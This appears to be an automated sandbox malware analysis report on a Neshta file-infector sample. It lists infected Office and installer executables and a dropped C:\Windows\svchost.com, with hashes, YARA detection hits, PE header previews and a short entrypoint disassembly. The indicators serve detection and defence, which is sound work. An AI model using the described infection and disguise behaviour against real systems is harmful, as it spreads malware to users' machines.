                                                          Entropy (8bit):5.56237653560924
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                          MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                          SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                          SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                          SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.388189611386593
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                          MD5:62A21A597FA5F5C489D266A87694FE61
                                                          SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                          SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                          SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.131620925268659
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                          MD5:1F414E9B0D1C3584418658367EC9242F
                                                          SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                          SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                          SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4980851403396676
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                          MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                          SHA1:06F814E81524B40587E503E32B8865D66A8383A6
                                                          SHA-256:3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
                                                          SHA-512:6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.57605386644689
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
                                                          MD5:100E15577B28178663E63AB854D28B4A
                                                          SHA1:DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
                                                          SHA-256:238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
                                                          SHA-512:5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):4.744720269791172
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
                                                          MD5:316C81CA54C5FAC241D16CA25E7B341C
                                                          SHA1:9E1199BCB359EA9146EAD52E765F3913A791CD7A
                                                          SHA-256:9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
                                                          SHA-512:CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.422024969420582
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
                                                          MD5:62F99051442ED97159B8D9CC03BBF8DC
                                                          SHA1:E22CF810217DFC5700C2C629162EF37CA672C957
                                                          SHA-256:C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
                                                          SHA-512:FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Joe Security
                                                          C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.441581793400409
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbqnf2+Q4NIvym8kig4kZ5vHDRKjwX03:JxqjQ+P04wsmJCEq+l428qjRNX4
                                                          MD5:E9116F5812E84117738237DE522B5445
                                                          SHA1:367077F61C829CCA2196A1FB3DD837DCB0933BE2
                                                          SHA-256:70ED68891E1B8B9EBEBDFAC5E78E5A2C96A494A309E6E86EDFBE1507C1AAFECD
                                                          SHA-512:B34DA2164DFE64B604B60430A32C6DE6EA99B13D4EF9B972D017977DCCCBE46327FB4BDD9F6FE580816AB277D142780057B5C632A2FDB556AC231E461DC340AB
                                                          Malicious:true
                                                          C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.485543952012
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC19QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85C1IyRF9YkjqOOOB8zAK2OoxAwMqx
                                                          MD5:5BFD09277E78C899F354E5E1144B162A
                                                          SHA1:41A9E6398CCD75ABF1B0E482A196EA27E6E3E9F1
                                                          SHA-256:043710D790F7C99AA46C0C6347CC38046AA1B097519DB5F6A257B8E9B5FF578E
                                                          SHA-512:2EC324783041FF402543E60FF1A8C3A8673AC68CF4FA1AF86D20248FF3874AEAA37DF83380612E49DE8D4FD94D58D4E0CF1888E3ED1B9369C12C60735506A20D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Joe Security
                                                          C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.562712500136307
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCzzw4jkfLZTxJtDSoieff:sr85CzEBfLzJtR
                                                          MD5:4C436BAC03F954F21B3D6192A898EDE3
                                                          SHA1:1817116645BC8D2C0FB3653694D9DEDB990D4D0A
                                                          SHA-256:2DFB8EEC68A9B0730567D2E18C9F4FDD2343238C6A2F4CA41750B229D3E3AD38
                                                          SHA-512:807A1F1D78DA195DF1D714E32C53C610FE3C0E2059BAE0C90C2A2491B48E93CA8D04BB8640CC034EF000F4846016CE4DE5EF7295FDBF72668C30645334F049D6
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Joe Security
                                                          C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.515754456132426
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCYRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CYRnRCr8JUg+t95Ldu
                                                          MD5:E1BDE940ECE6F7C7F80841740A907C05
                                                          SHA1:188CE476AF1396E98E7D95EC6B3D22DADC85F9DE
                                                          SHA-256:B4EDE55B8093B7E5BB26CF08684B3670B7890591FCCFBEC83AF2F79907401239
                                                          SHA-512:EB025FB6495BC3D34BEDB05ED5120EE1097B9EE8B233A2AA3ED7806802B8DEE0C7F76D0C7A600CB0910BDD2962E4C3695B1D8D31198C85AD7F139F3EFB939979
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Joe Security
                                                          C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.562807885786494
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCKzw4jkfLZTxJtDSoieff:sr85CKEBfLzJtR
                                                          MD5:933DB9DADE1B2ADDE200F742940F61C9
                                                          SHA1:19208F6EE0F07F6BF61A9E8FA04BB6B299A2C512
                                                          SHA-256:CFA2C4E5DC5AE16C510BC789B478D13F9EC05372DBADCE8C0E78A7DCFC16A3DC
                                                          SHA-512:B98BDC38BEF6AFB8E6EF2230627290E0110875197625CCE0CC9CFD9A33954AD53F678148935442753E0E2D713DA17FDFD695E997ABFF45FBBCA22BD1F6B1C12D
                                                          Malicious:true
                                                          C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.51577139672898
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCkRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CkRnRCr8JUg+t95Ldu
                                                          MD5:60738E3D150CFDD2CD11C779ED82C473
                                                          SHA1:ED9010E56426DD75DA04F45A22C6964A06DB52C0
                                                          SHA-256:AD8620D29F365145B787B9225905089FA1205A6A67775BD36EE6FF66F9AE56EB
                                                          SHA-512:F67BBBE6A8134E6342647AA03C7B59C2AA78D224DAE82B11D5EE5FC0B15BE90C30E604411E97E2E4E6E8B28D8424A2C9B0E10A130A5F21B4FA0C6A121A667D63
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Joe Security
                                                          C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.485564517117053
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCz9QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85CzIyRF9YkjqOOOB8zAK2OoxAwMqx
                                                          MD5:6A3C227401357DD0ACEE2988511EC44C
                                                          SHA1:2CB5F9BFC06F902D3B8ADCEBDF7A6DB5E8D1815A
                                                          SHA-256:67FD35785411A8926559D94CF258C6CC40A1D2683B36CBD3E99124B43D3F4307
                                                          SHA-512:A2A3F4E5FD748BF74A6CDE8674540AD893F7F8B6FFBD896E81911805DF9E8DC3CCDB832661DA8A7A5505F74EA81863593DDF7CF4759C1028846C4461EA0D8E71
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.5964179831347325
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                          MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                          SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                          SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                          SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):73728
                                                          Entropy (8bit):5.922084559506043
                                                          Encrypted:false
                                                          SSDEEP:768:l3884wDr9n0++Bt2FBUrW0ntS7T3b1vZHP6Rxux0uPwas3OR+MxbpSF07xx:Vfy+dJ4tS7T3PS2CuPwL+Hzrxx
                                                          MD5:6CE7CC1F376F6BD9D090EAF04EF72DFE
                                                          SHA1:FB2693061F91F2C9FA4480EDAC7CAE0FA7602EC7
                                                          SHA-256:2E87815522531721634BE2EF071B1292612FC7A8A07E785645C37EAF56E0A6E9
                                                          SHA-512:3D10AA247C8953D20A00AF5D46E1E720A14967FF3306D9009C87C8C0754A5D6F924517882503E422513B54B51DE0187769FA9F7C0ABF3B3F773D5EF6243C2042
                                                          Malicious:true
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....WL.....................0......\.............@..........................0.......\..........................................(.... ......................................................................(... .......,............................text............................... ..`.data...............................@....rsrc........ ......................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.265455130586502
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCnaBqYq8A5V626j2yk+w9PajrxWfv:sr85Cnas/8OUx2ykUGv
                                                          MD5:BB762A775319A10BBC68B0EA9822F00E
                                                          SHA1:6BE26E938DCC437BDE58003D1314412C1EAB6550
                                                          SHA-256:1AC2F8C8F2D4F2257C9F762D44E760420940AE2E518DD4C5A2DD573077BB93A3
                                                          SHA-512:1C1B1E23140987DFC728CC02F57F2BB8D39E00ABEEF34D0C13B67555CAB231B35C73C3004B3EAD84936903629FF25D4D42165A26D569DD2260895E2C17E3A1FE
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Windows\svchost.com
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):6.02108194650798
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ:JxqjQ+P04wsmJC
                                                          MD5:15D8AB38054A766318C235EE74AC10E8
                                                          SHA1:836C007D0760F9BA204F73553518004C2D7A6746
                                                          SHA-256:0A856419B518368CB9945D8BFB2B05FB2763DB8A9BCA7F5280CA1A487855A4EC
                                                          SHA-512:B00B269F2F6D020D7ECF422859965691E37083E6F80701C3021F6EDB3C2C76AD0261DBF4F2B3877CF9B0604F93430E77BBD7499AD4813BDA72462253E3176397
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Windows\svchost.com, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.165280406994612
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 97.38%
                                                          • Win32 Executable Borland Delphi 6 (262906/60) 2.56%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          File name:Z68mMCAxFZ.exe
                                                          File size:115200
                                                          MD5:547612a9ff746063a74c71b009230500
                                                          SHA1:c04b0adc612addc701e3a0336a4e8a23fbd331c4
                                                          SHA256:bf99b231b81ab2ba895c0cbf395a5fdb5fc18d3465592150e365f31302c8250a
                                                          SHA512:545b74192e076e46a960a05e5281dedfd00c7fc002aeec60f04f55543eb79beaa2866ab20e16903e2d1601275e28be73fa0a5ef5abe23fd2e13c38805cdd9402
                                                          SSDEEP:1536:JxqjQ+P04wsmJCfCuPwL+Hzrxx9Yfy+dJ4tS7T3PSC:sr85C643FYPP4tkr
                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                          File Icon

                                                          Icon Hash:20047c7c70f0e004

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4080e4
                                                          Entrypoint Section:CODE
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                          DLL Characteristics:
                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:9f4693fc0c511135129493f2161d1e86

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, FFFFFFE0h
                                                          xor eax, eax
                                                          mov dword ptr [ebp-20h], eax
                                                          mov dword ptr [ebp-18h], eax
                                                          mov dword ptr [ebp-1Ch], eax
                                                          mov dword ptr [ebp-14h], eax
                                                          mov eax, 00408054h
                                                          call 00007F8CE0E225F7h
                                                          xor eax, eax
                                                          push ebp
                                                          push 00408220h
                                                          push dword ptr fs:[eax]
                                                          mov dword ptr fs:[eax], esp
                                                          mov eax, 004091A8h
                                                          mov ecx, 0000000Bh
                                                          mov edx, 0000000Bh
                                                          call 00007F8CE0E25741h
                                                          mov eax, 004091B4h
                                                          mov ecx, 00000009h
                                                          mov edx, 00000009h
                                                          call 00007F8CE0E2572Dh
                                                          mov eax, 004091C0h
                                                          mov ecx, 00000003h
                                                          mov edx, 00000003h
                                                          call 00007F8CE0E25719h
                                                          mov eax, 004091DCh
                                                          mov ecx, 00000003h
                                                          mov edx, 00000003h
                                                          call 00007F8CE0E25705h
                                                          mov eax, dword ptr [00409210h]
                                                          mov ecx, 0000000Bh
                                                          mov edx, 0000000Bh
                                                          call 00007F8CE0E256F1h
                                                          call 00007F8CE0E25748h
                                                          lea edx, dword ptr [ebp-14h]
                                                          xor eax, eax
                                                          call 00007F8CE0E23032h
                                                          mov eax, dword ptr [ebp-14h]
                                                          call 00007F8CE0E235C6h
                                                          cmp eax, 0000A200h
                                                          jle 00007F8CE0E267E7h
                                                          call 00007F8CE0E25CC6h
                                                          call 00007F8CE0E264D9h
                                                          mov eax, 004091C4h
                                                          mov ecx, 00000003h
                                                          mov edx, 00000003h

                                                          Data Directories

                                                           Name | Virtual Address | Virtual Size | Is in Section
                                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15000 | 0x864 | .idata
                                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0x1400 | .rsrc
                                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18000 | 0x5cc | .reloc
                                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x17000 | 0x18 | .rdata
                                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                          Sections

                                                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                           CODE | 0x1000 | 0x722c | 0x7400 | False | 0.617355872845 | data | 6.51167217489 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                           DATA | 0x9000 | 0x218 | 0x400 | False | 0.3623046875 | data | 3.15169834056 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
